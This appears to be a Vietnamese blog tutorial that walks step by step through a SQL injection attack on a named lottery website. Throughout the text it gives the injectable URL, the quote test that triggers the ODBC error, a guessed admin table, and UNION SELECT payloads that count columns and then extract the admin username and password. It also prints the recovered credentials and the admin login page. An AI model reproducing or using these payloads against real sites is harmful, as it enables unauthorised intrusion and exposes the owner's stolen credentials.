Site dính lỗi:
http://www.xosoquangtri.com.vn/news.asp?tin_ID=83
Thêm dấu ' vào. Bung lỗi kìa
http://www.xosoquangtri.com.vn/news.asp?tin_ID=83%27
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=83''.
/news.asp, line 16
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=83''.
/news.asp, line 16
Loại này ta phải đoán. Okie đoán là tb_admin nhé :|
www.xosoquangtri.com.vn/news.asp?tin_ID=-83 union select 1,2 from tb_admin
Her. Trúng roài =]]
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/news.asp, line 16
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/news.asp, line 16
Giờ Union đến số cột đúng thoai :|
Thêm vào lần lượt ",3,4,5..." đằng sau 1,2 nhé
www.xosoquangtri.com.vn/news.asp?tin_ID=-83 union select 1,2,3,4,5,6 from tb_admin
Ngon rồi, hiện ra số 2,3 kìa. Giờ đoán tên username với password nhé. Thay 2 thành username, 3 thành password xem sao :|.
http://www.xosoquangtri.com.vn/news.asp?tin_ID=-83 Union Select 1,username,password,4,5,6 From tb_admin
=]] Ra luôn.
xosoquangtri
xoso2011@
xoso2011@
Login Admin đi nào :|.
http://www.xosoquangtri.com.vn/login.asp
[End Tut by Kjdvn1340]
Không có nhận xét nào:
Đăng nhận xét